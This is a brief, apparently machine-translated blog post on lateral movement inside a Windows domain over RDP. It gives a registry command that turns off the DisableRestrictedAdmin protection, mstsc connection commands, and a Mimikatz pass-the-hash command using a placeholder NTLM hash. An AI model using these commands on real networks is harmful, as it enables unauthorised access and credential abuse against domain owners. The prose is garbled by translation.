current position:Home>Domain lateral move RDP delivery

Domain lateral move RDP delivery

2022-05-15 07:42:15Low risk performing artist

The domain moves horizontally RDP Pass on -Mimikatz
In addition to the above IPC,WMI,SMB In addition to the connection of other protocols , Get the plaintext password or HASH Ciphertext can also be passed through RDP Protocol for connection operation .
notes :RDP Equivalent to linux Inside ssh, Remote connection protocol ,linux Of ssh It's the equivalent of windows Of rdp agreement , That's what they say 3389 port .

RDP Plaintext password connection
mstsc.exe /console /v: /admin
RDP Ciphertext HASH Connect
windows Server Need to open Restricted Admin mode, stay windows 8.1 and windows Server 2012R2 On by default , At the same time, if Win 7 and Windows Server 2008 R2 Installed 2871997/2973351 Patches also support ; Open command :
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
Start and run :
mstsc.exe /restrictedadmin

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208sdlfkjssdlfksj “/run:mstsc.exe/restrictedadmin”

copyright notice
author[Low risk performing artist],Please bring the original link to reprint, thank you.

Random recommended